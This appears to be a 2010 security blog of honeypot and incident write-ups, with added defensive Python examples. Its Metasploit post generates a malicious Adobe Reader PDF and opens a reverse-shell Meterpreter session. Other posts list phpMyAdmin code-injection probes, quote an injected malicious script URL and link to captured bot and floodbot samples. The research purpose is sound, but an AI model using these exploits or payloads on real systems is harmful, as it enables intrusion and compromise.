Tuesday, September 28, 2010

Intruder alert

It's 4 o'clock in the morning and the Cisco intrusion alert system is flashing a red "Possible security breach" on the big wall screen while alerting the sysadmins with voice mails and e-mails ... or maybe I'm still dreaming and this was part of a movie. Still, there is an alert on my telephone lying on the floor next to me with the message "there must be something here". This is a default message that I've put in a series of bash scripts running under cron every now and then, to alert me to possible filesystem changes and to files or directories created where they are not supposed to be.

I've been running some custom Windows and Linux honeypots for some time now in order to collect malware, bots and other goodies, mostly as a hobby.

This time the alert came from a Linux system running an old phpMyAdmin package. It's the second time within a month that this system has been compromised, so there is a lot of phpMyAdmin scanning activity going on, against both Linux and Windows systems.

Logging in to the system, I immediately checked the running processes; it's common in these attacks for the attacker to hide the bot or backdoor behind a fake process name. Most attackers mask their backdoors or bots as httpd or apache processes, making the binary less obvious for the sysadmin to locate at first glance.

This time the binary was running under the rpc.idmapd name:
nobody   15550  0.0  3.1  44368 30928 ?        S    04:11   0:06 rpc.idmapd

Easy to spot, since that process didn't belong to this specific system's configuration. Finding the location of the binary is easy with the lsof command: lsof -p 15550 gave the whereabouts of the binary and its open connections. At this point I usually keep a process memory dump for further analysis, using pcat from TCT ( http://www.porcupine.org/forensics/tct.html ); a lot of useful information can be found in the active memory of the process, such as connection strings, usernames and passwords, etc.
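The same check the post does by eye (a daemon name that does not belong to the system, a binary living somewhere odd), as an added example that is not part of the original post: it compares the name ps shows with the binary behind /proc/<pid>/exe. The list of untrusted directories is my assumption; the daemon names come from the post.

```python
import os
import pwd

# Directories no legitimate daemon is started from (my choice for this example).
UNTRUSTED_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# Daemon names the post mentions bots being hidden behind.
DAEMON_NAMES = {"httpd", "apache", "apache2", "rpc.idmapd"}


def suspicious(argv0, exe, user):
    """Compare the name ps shows (argv[0]) with the binary really executing
    (/proc/<pid>/exe). Returns a list of reasons; an empty list means clean."""
    reasons = []
    if exe.endswith(" (deleted)"):  # binary unlinked after start, a common bot trick
        exe = exe[:-len(" (deleted)")]
        reasons.append("binary was deleted after start")
    if any(exe == d or exe.startswith(d + "/") for d in UNTRUSTED_DIRS):
        reasons.append("binary lives under " + os.path.dirname(exe))
    shown, real = os.path.basename(argv0), os.path.basename(exe)
    if shown != real:  # interpreter symlinks also trip this; review hits by hand
        reasons.append("shown as %r but executing %r" % (shown, real))
    if shown in DAEMON_NAMES and reasons:
        reasons.append("masquerading as the %r daemon (user %s)" % (shown, user))
    return reasons


def scan_proc():
    """Walk /proc and return {pid: (argv0, exe, user, reasons)} for odd processes."""
    hits = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/cmdline" % pid, "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode("utf-8", "replace")
            exe = os.readlink("/proc/%s/exe" % pid)
            uid = os.stat("/proc/%s" % pid).st_uid
        except OSError:
            continue  # kernel thread, already exited, or not ours to read
        try:
            user = pwd.getpwuid(uid).pw_name
        except KeyError:
            user = str(uid)
        reasons = suspicious(argv0, exe, user)
        if reasons:
            hits[int(pid)] = (argv0, exe, user, reasons)
    return hits


if __name__ == "__main__":
    for pid, (argv0, exe, user, reasons) in sorted(scan_proc().items()):
        print(pid, user, argv0, exe, "; ".join(reasons))
```

Run it as root from cron, the way the post's alert scripts run, so that /proc/<pid>/exe of every process is readable.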

This time the binary was, again, a mech bot ( http://www.energymech.net/ ) connecting to the QuakeNet IRC network, nothing interesting here :/ hope the attackers will be more creative next time.

Bot packed, http://www.deventum.com/research/15550.tar.gz

Sunday, September 12, 2010

Phpmyadmin scans

Sunday night and the weather is getting colder, kids asleep, a nice time to check on the honeypot logs. Some days ago SANS reported a then-new binary, "dd_ssh" ( http://isc.sans.edu/diary.html?storyid=9370 ), and related the attack to the phpMyAdmin vulnerability. The honeypot is also grabbing some URLs possibly related to the same attack vector.

GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1

There is one user agent that also appears in the logs, " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro "; the report on whitehat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ) though gives nothing like whitehat...
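As an added example (not from the post), a small log check for the scan pattern above: it groups the config/config.inc.php?p= probes by source address, notes the ZmEu user agent, and singles out probes that got a 200, since those mean a config.inc.php really existed at that path. The log lines are constructed in Apache combined format with RFC 5737 documentation addresses.

```python
import re
from collections import defaultdict

# Apache "combined" log format. The SAMPLE_LOG lines below are constructed for
# this example (RFC 5737 documentation addresses), not taken from the honeypot.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# The probe from the log above: some directory, then config/config.inc.php
# with a p= parameter carrying PHP code (phpinfo(); in the captured scans).
PMA_PROBE = re.compile(r'/config/config\.inc\.php\?p=', re.IGNORECASE)
ZMEU_UA = re.compile(r'\bZmEu\b')

SAMPLE_LOG = """\
192.0.2.10 - - [12/Sep/2010:22:14:01 +0300] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 512 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
192.0.2.10 - - [12/Sep/2010:22:14:01 +0300] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 512 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
192.0.2.10 - - [12/Sep/2010:22:14:02 +0300] "GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 200 3140 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
198.51.100.7 - - [12/Sep/2010:22:20:45 +0300] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def analyse(log_text):
    """Group phpMyAdmin config.inc.php probes by source address. A probe that
    was answered with 200 means a config.inc.php really existed at that path,
    which is the case to chase first."""
    report = defaultdict(lambda: {"probes": 0, "dirs": set(),
                                  "answered_200": [], "zmeu": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not PMA_PROBE.search(m.group("path")):
            continue
        entry = report[m.group("ip")]
        entry["probes"] += 1
        entry["dirs"].add(m.group("path").split("/config/", 1)[0])
        if m.group("status") == "200":
            entry["answered_200"].append(m.group("path"))
        if ZMEU_UA.search(m.group("ua")):
            entry["zmeu"] = True
    return dict(report)


if __name__ == "__main__":
    for ip, e in analyse(SAMPLE_LOG).items():
        print(ip, e["probes"], "probes from", sorted(e["dirs"]),
              "ZmEu" if e["zmeu"] else "", e["answered_200"])
```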

Thursday, September 9, 2010

Adobe 0day cooltype and metasploit

Once more Metasploit is way ahead of the competition, this time with a 0day for Adobe Reader. Having some time today, I thought I'd give it a try.

In a Windows 7 VM, I got the latest PDF reader from Adobe ( version 9.3.4 at the moment ).

Now, on the Metasploit console:

root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >

msf exploit(adobe_cooltype_sing) > info

       Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Unknown
   <@sn0wfl0w>
   <@vicheck>
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                 Required  Description
  ----        ---------------                 --------  -----------
  FILENAME    msf.pdf                         yes       The file name.
  OUTPUTPATH  /home/root/trunk/data/exploits  yes       The location of the file.

Payload information:
  Space: 1000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the Smart INdependent
  Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
  Adobe Reader. Prior version are assumed to be vulnerable as well.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
  http://www.osvdb.org/67849
  http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
  http://www.adobe.com/support/security/advisories/apsa10-02.html


msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >

Let's grab msf.pdf now and start a generic handler on the msfconsole:



msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

On the Windows 7 VM now,

Clicking the msf icon,


No luck at the moment on Windows 7: the application crashed with no session. Trying the same on Windows XP, the screen shows the following:


And on our server we have:

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010

meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter >

I hope it won't take long for the Windows 7 version.
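From the defender's side, as an added example that is neither the post's nor Metasploit's code: a check over a TrueType font blob for the field the module name refers to. It assumes the SING table layout from Adobe's glyphlet specification, eight 16-bit fields followed by the 28-byte uniqueName (27 characters plus a NUL), and flags a uniqueName with no terminator in those 28 bytes. The font blobs are constructed test data.

```python
import struct

# SING table layout assumed here (Adobe glyphlet spec): eight 16-bit fields,
# then uniqueName, 28 bytes = 27 characters plus a terminating NUL.
SING_HEADER = 16
UNIQUE_NAME_LEN = 28


def find_table(font, wanted):
    """Return (offset, length) of a table in an sfnt/TrueType blob, or None."""
    if len(font) < 12:
        return None
    num_tables = struct.unpack(">H", font[4:6])[0]
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            return None
        tag, _csum, off, length = struct.unpack(">4sIII", font[rec:rec + 16])
        if tag == wanted:
            return off, length
    return None


def sing_unique_name_unterminated(font):
    """True if the font has a SING table whose uniqueName carries no NUL within
    its 28 bytes, i.e. the field a string copy into a fixed buffer would overrun."""
    loc = find_table(font, b"SING")
    if loc is None:
        return False
    off, _length = loc
    field = font[off + SING_HEADER:off + SING_HEADER + UNIQUE_NAME_LEN]
    if len(field) < UNIQUE_NAME_LEN:
        return True  # table truncated: nothing guarantees a terminator either
    return b"\0" not in field


def make_font(sing_table):
    """Wrap SING bytes in a minimal one-table sfnt container (constructed test data)."""
    header = struct.pack(">IHHHH", 0x00010000, 1, 16, 0, 0)
    record = struct.pack(">4sIII", b"SING", 0, 12 + 16, len(sing_table))
    return header + record + sing_table


# Constructed samples: a well-formed name, and a name with no terminator.
BENIGN = bytes(SING_HEADER) + b"ExampleGlyphlet".ljust(UNIQUE_NAME_LEN, b"\0")
UNTERMINATED = bytes(SING_HEADER) + b"A" * UNIQUE_NAME_LEN

if __name__ == "__main__":
    print("benign:", sing_unique_name_unterminated(make_font(BENIGN)))
    print("unterminated:", sing_unique_name_unterminated(make_font(UNTERMINATED)))
```

The font has to be pulled out of the PDF first (the FontFile2 stream, inflated if it is FlateDecode-compressed); the check then runs on the raw sfnt bytes.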

Infected website cleaning

Having a lot of websites to monitor, many times even in the most recently updated ones you might find backdoors or other goodies. A couple of days ago a client called and said that Google Safe Browsing was blocking his website, at least one of them, and that another one was popping up advertisements when visited. It came as a surprise to me that those sites were infected, because I knew they had been updated recently and to my knowledge there was no vulnerability in the latest update.

Poking around a bit, it didn't take long to realize that the infection was done through FTP and there was no SQL injection or any other vulnerability in the code of the website.

Most of the time my work finishes there: I tell the client to clean up the code and change the FTP password. In this case the client was also a good friend and I thought I'd give him a bit of help.

The infected files were .php and .html files containing the following code,

<script src="hxxp://youngarea.ru/Vector.js" type="text/javascript">

grep gave the following result,

# grep -R youngarea *| wc
    140     420   16869

140 files infected; cleaning them one by one could take some time.

Sed to the rescue !

The following command looks in the current directory (recursively) for files with the .php extension and, on every line containing youngarea, replaces the span starting with < and ending with > with nothing, thus cleaning up the infection.

find . -name "*.php" -type f | xargs sed -i 's/<.*youngarea.*>//g'

The same command was also applied to the files ending with .html:

find . -name "*.html" -type f | xargs sed -i 's/<.*youngarea.*>//g'

and the website was clean in a couple of seconds.
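The sed pattern <.*youngarea.*> is greedy: on a line that also carries legitimate markup it deletes everything from the first < to the last >, not just the injected tag. As an added example (not the post's script), the same clean-up in Python with a regex limited to the injected tag, a .bak copy before each rewrite and a dry-run mode; the sample HTML line is constructed, and greedy_clean shows what the sed expression does to it.

```python
import os
import re
import shutil

# Only the injected tag, as the post found it; everything else on the line stays.
INJECTED = re.compile(
    r'<script[^>]*youngarea\.ru/Vector\.js[^>]*>\s*</script\s*>'
    r'|<script[^>]*youngarea\.ru[^>]*>', re.IGNORECASE)
# The post's sed pattern, for comparison: it eats from the first < to the last >.
GREEDY = re.compile(r'<.*youngarea.*>')

EXTENSIONS = (".php", ".html")
# Constructed sample line: legitimate markup on both sides of the injection.
SAMPLE = ('<p>Hello</p><script src="http://youngarea.ru/Vector.js" '
          'type="text/javascript"></script><a href="/next">next</a>\n')


def clean_text(text):
    """Strip the injected tag(s) only; returns (cleaned text, number removed)."""
    return INJECTED.subn("", text)


def greedy_clean(text):
    """What the post's sed expression does to the same line."""
    return GREEDY.sub("", text)


def clean_tree(root, dry_run=True):
    """Walk root; for each infected .php/.html file report it and, unless
    dry_run, copy it to <file>.bak and rewrite it. Returns {path: tags removed}."""
    touched = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as f:
                original = f.read()
            cleaned, n = clean_text(original)
            if n == 0:
                continue
            touched[path] = n
            if not dry_run:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as f:
                    f.write(cleaned)
    return touched


if __name__ == "__main__":
    print(clean_text(SAMPLE)[0].rstrip())
    print(repr(greedy_clean(SAMPLE)))
```

Run clean_tree(".") first to get the list of files and counts, compare it with the grep result, then rerun with dry_run=False.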

Monday, September 6, 2010

Floodbots and more

Another collection from the honeypot: floodbots and spam scripts. This one I have personally seen many times on different servers (sender, From: HSBC ), in the /tmp directory under the names a/ and ".     ".

Spam-sending scripts at http://www.deventum.com/research/spam.tar.gz , a poor man's perl bot from the TeaMrx team at http://www.deventum.com/research/fetch.txt and finally an eggdrop with flood modules added, capable of more than 50 Mbps of flood traffic, at http://www.deventum.com/research/floodbots2.tar.gz